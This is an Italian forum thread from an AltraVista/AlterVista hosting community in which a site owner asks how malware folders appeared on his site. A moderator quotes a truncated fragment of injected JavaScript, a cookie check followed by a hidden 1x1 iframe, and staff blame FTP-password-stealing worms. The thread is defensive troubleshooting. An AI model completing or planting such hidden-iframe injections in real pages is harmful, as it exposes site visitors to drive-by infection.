Visualizzazione risultati 1 fino 5 di 5

Discussione: Malware sul sito

  1. #1
    Guest

    Predefinito Malware sul sito

    Saalve, dopo un secolo torno a postare su AV per una cosa che mi è successa su uno dei siti che ho qui su AlterVista.

    Oggi accedendo (dopo qualche settimana di inattività) al pannello di controllo mi è stato chiesto di cambiare la password per "motivi di sicurezza".

    Dopo averlo fatto, ho letto un avviso che mi avvisava della presenza di malware sul mio sito... ed effettivamente c'erano 3 cartelle con dicitura casuale alfanumerica nella root, con dentro un singolo file html. Ho subito provveduto a eliminarle, ma ora mi viene il dubbio: com'è possibile che qualcuno sia riuscito a caricarvele quando solo io possiedo la pass, il sito non è né pubblico (in via di sviluppo, occorre un login per accedere) né pubblicizzato, e comunque non vi è alcuno spazio per l'upload dei file nel sito.

    Ho controllato sul mio PC e non c'è traccia di contagio... com'è potuto essere?
    Al limite si può avere un log dei "movimenti FTP", così da capire meglio?

    Se serve, l'url è h**p://zortar.altervista.org
    Ultima modifica di andreafallico : 15-11-2011 alle ore 00.00.45

  2. #2
    L'avatar di andreafallico
    andreafallico non è connesso Super Moderatore
    Data registrazione
    02-06-2009
    Messaggi
    1,981

    Predefinito

    Inoltre c'è del codice javascript malevolo:
    Codice:
    <script type="text/javascript">function get_cookie(Name) {	..... document.write('<iframe frameborder=0 height=1 width=1 scrolling=no src="....</script>
    http://forum.it.altervista.org/759986-post30.html

  3. #3
    L'avatar di dapeco
    dapeco non è connesso Community Manager
    Data registrazione
    21-10-2003
    Residenza
    Brusasco (To)
    Messaggi
    4,909

    Predefinito

    Questo tipo di infezione normalmente è causata dalla presenza di worm sul pc utilizzato per l'aggiornamento, via ftp, del sito web. Esegui una scansione approfondita con un buon antivirus.
    Ho visto cose che voi utenti non potreste immaginare... siti da combattimento irregolari al largo dei bastioni di Orione. E ho visto account balenare nel buio vicino alle porte di Tannhauser. E tutti quei momenti andranno perduti nel tempo come lacrime nella pioggia. È tempo di sospendere...

    ASD Brusasco - C'è altro sport oltre al calcio!

    "Io sono vivo, voi siete morti" (Philip Dick, Ubik)

  4. #4
    Guest

    Predefinito

    Non avevo notato il JavaScript O.o rimosso all'istante.

    Il bello è che una scansione non mi rileva niente, e il codice è presente solo su quel sito (e in FileZilla ne ho memorizzati ben più di uno)... proverò altri antivirus, vediam...

    EDIT: Probabilmente ho capito. Tempo addietro lavoravo al progetto insieme a un altro programmatore che poi *puff* è sparito, mesi fa. Probabilmente ha lasciato comunque memorizzati i dati da qualche parte nel suo PC, ed è stato lui ad essere stato infettato. Ho cambiato ovviamente la password, vediamo se ricapita :)
    Ultima modifica di Zorinik : 16-11-2011 alle ore 00.29.57

  5. #5
    L'avatar di dapeco
    dapeco non è connesso Community Manager
    Data registrazione
    21-10-2003
    Residenza
    Brusasco (To)
    Messaggi
    4,909

    Predefinito

    Sì, il problema principale di questi worm è che spesso prendono le password, ma non usano immediatamente le credenziali, anzi spesso possono passare settimane se non mesi prima della compromissione dei contenuti.
    Ho visto cose che voi utenti non potreste immaginare... siti da combattimento irregolari al largo dei bastioni di Orione. E ho visto account balenare nel buio vicino alle porte di Tannhauser. E tutti quei momenti andranno perduti nel tempo come lacrime nella pioggia. È tempo di sospendere...

    ASD Brusasco - C'è altro sport oltre al calcio!

    "Io sono vivo, voi siete morti" (Philip Dick, Ubik)

Regole di scrittura

  • Non puoi creare nuove discussioni
  • Non puoi rispondere ai messaggi
  • Non puoi inserire allegati.
  • Non puoi modificare i tuoi messaggi
  •